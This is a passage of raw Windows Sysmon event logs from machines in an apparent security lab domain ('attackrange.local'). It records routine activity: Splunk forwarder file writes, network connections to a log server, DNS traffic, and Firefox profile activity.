07:41:58.586{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:59.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20A08912DD30BBCEA515C329C8897F7F,SHA256=C6294CF7382A39E4F08FB12E87A5994D360171EE3A821DBAE65BD6D13084B922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:59.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8FE2F5AACB088B71FD20809F0253F5F,SHA256=D10F670FB4801CDC1A4B8AEED89547048E770CCBA496D567DD77D8EC68F5BB7D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:59.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1BC07E5FD8A18F8F289EDA395661EA4,SHA256=AA70BC0CB8036F67BD83D1671016762B24DCF1085A7E5030F5EA82BF867967D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:59.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=CBF67D2AD4D8339926B6765FF7D4FDFF,SHA256=18BA55D4C5E14B2528EFAA3F395781582CC9867D21D1A49C33C1D1BDC5156BA7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:50.214{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50871-false10.0.1.12-8089- 23542300x80000000000000001045421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:00.941{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0BB03939B9078AA7DA729440F04064C,SHA256=5E37DB3A3994084D14935183E9C5F03A2F8398C829D253613AD60BD7FF85382B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:00.533{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F98B8562EC3FF0EDCEF1CE987CE3BA2,SHA256=8469AB290C93D1C52250424C16E62C17A827D3C03FB9287543B49059CC598BA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:52.153{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local64247- 354300x8000000000000000805676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:59.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57126-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:01.957{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=554F243D88270D19315DE6497E761E49,SHA256=C2B1CCD2E8F6575CB87B9D8B311FCC6A727725B2AAAF51C9947C7A436D633440,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:01.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68B634E6E2CCE025D8E08903B65BCF60,SHA256=A3787A1C69EC2103F3D78F7EBA0F5B9A887E2381D193B034EA316B92599C67A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:53.596{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50873-false10.0.1.12-8000- 354300x80000000000000001045423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:52.158{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-890.attackrange.local50872-false8.238.35.126-80http 354300x80000000000000001045422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:52.155{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55778- 23542300x80000000000000001045426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:02.957{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30BD5D7596BB08C2611B2B1740256F3,SHA256=620C9A6791F7E1C4DFE66A9B225B41BAC50DCB23B3A0ED30F1CE737A34955A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:02.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EC7324614A8879D0A74CC53DA3F2F5E,SHA256=EF8D594A7F7B60FAB68C3BA15002976674DF0C4D0134946AEDCD0411DAF33157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:03.975{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8844D52D65A510A746BFC61D1B862716,SHA256=8F8373F364036FD59A552E50A7F191ECBFB1DB017063645873202CBE64EDFFC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:03.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1197E36AD67547747566B47DDE39D3C,SHA256=66196EEC676ACD217674A7367AB170C24769F424DC39C5D30BA8FCCB137567F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:04.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=165982A779DC6FE4BEBA234F80DBE516,SHA256=84D08DAD73D4237BA3A659BA2A6E29BB78C5378F4908098B520A510AD8B503BA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:04.564{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F884B57D130FA3D98F66A2D86ECEDF,SHA256=B797843575637030C8000AD34E1B1263C834FFD13512DC87EBF86CCF8D97BF9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:05.564{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C50792D51F70CB56B3BD200FA57410,SHA256=3123811B531BF305DFBB55413D4F36993D116E25774F91E843B232DD1A3CADB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:05.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57127-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:06.564{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=646412085DBCC5925C653B4F81C63166,SHA256=D5BD8E8B81598A5D3BC12960E0E32E4FE2B72641C2FF8FA268C7D4C64ADD4698,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.089{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.042{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 
10341000x80000000000000001045432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.042{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001045431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:42:06.042{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.407.111828348C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001045430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:42:06.042{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.407.111828348C:\Program Files\Mozilla Firefox\firefox.exe 
23542300x80000000000000001045429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=504F6979523580F915836A0A9DBE7762,SHA256=77480C73A5AD5B96CBB6741C7385A537AC546319F915039507ED4A2FFC98793C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:07.580{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36B3FFA979A88BE4783D6929F2D41C51,SHA256=5D4567E7B1ECBA8474EB86DEFD2F4F5A2FF6D96022198692E228FE662FD1C6FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:58.733{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50874-false10.0.1.12-8000- 23542300x80000000000000001045435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:07.042{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97660B17F797A18D471A25E5A166AA69,SHA256=672CFFF18E07404C680EBA28A9441BDCC9CFE476195F7531CA091D3E1250016F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:08.611{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B179557545AE417C4B7657E0D370E189,SHA256=583B590791A94A155BAB1E40C46845174D709A4A74BDF248AE8F91EEA2B79DB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.503{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=94D4F9052682CFE6283A54C4E4376C06,SHA256=BA63BF21A83DF5614C9424572E4028897026840F32E0E8E64C4C4904177ACB69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6A629D24517E6F2A83ACC3A5D9CC4358,SHA256=60CE43DA74477129D0FCA03CD8A1E832337851551CDF483B220182CA61A1923B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F45FDA3FD0F97B5D3C8556F513FA4895,SHA256=FBB6959C8F364BC86C786DDAC07755D33BB96BB468932B25ED3539BCD58A6D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EB5CC9BE3B286DB07B553415F47684AB,SHA256=D0FB082507B27BAFB8574C9F9D0F230DAE15350656658A7A2D7706FE3012F9F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D293774C52B1A2862BBBE0DD0582517A,SHA256=436711D842EB0125C3364ECCF942287130125766C83CCF0C88C2F0A8BA20C0A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C745088EC979F9F34A53DC296B2DA81A,SHA256=389EE94F5E6004414EA0D0D06F816C2573FF42612FED739B5D0078AE297847E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4C8364AE8724C6AE4E9547B6F192FA5D,SHA256=51E4EDCBB77648A343FCA6FD6A3298B04B34B6585AE4EC7EBC322676FE6E1951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0ED92001D2219449A196572B56919B56,SHA256=4B28F26BAB8D74AF9ED4F8203224D75973A6E6FB5B11E553309A396C00AF674E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A2C9298C1C5463F3E1332779B8CFB0A3,SHA256=427AE1783979DAE45176380F6F207E0E18BA1EAE1E043AFF51360150F3D3B187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0A3DCB1B0CE4B5DA13DAF653A3B18464,SHA256=2BA8FD8A43D68DCDB02E5693E3C74BF140F7978F5E69A2C2E8FF02202DB7016C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=85AC2A30DEE5697C6DB58F799D32D13D,SHA256=E67E5BEF0480F7DFEE9D1975C9F21B16633758A656A36EB8545C3CFC78216E27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.057{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B5BA0F79B4FEF31CCE895E3A9C02FE,SHA256=108898A3E635FD9326F51183F19DB4F8DDCE61A390E49FB1A7036697FEBA88F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:09.658{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00512F5E03E0F6F32B422B8CC3953E9B,SHA256=0DA22B9AE002AD83CDAD36D743BA5FFE604E4D1D06FC02BE9B8266291CC0A0D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:09.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8CCD67913796F910BC36FD7A806DB83,SHA256=784CAFC11EEF99D9675C4E30247E359AA867BAB2F0FDCEDAB0263751E5F74C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:10.705{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E1015CFB33E3FF4312B860682FFF38,SHA256=6FCF14D174BC3A6176067925833E3EC1AFA42B87274752B3FCEA27D8D1BB0D1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:10.086{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 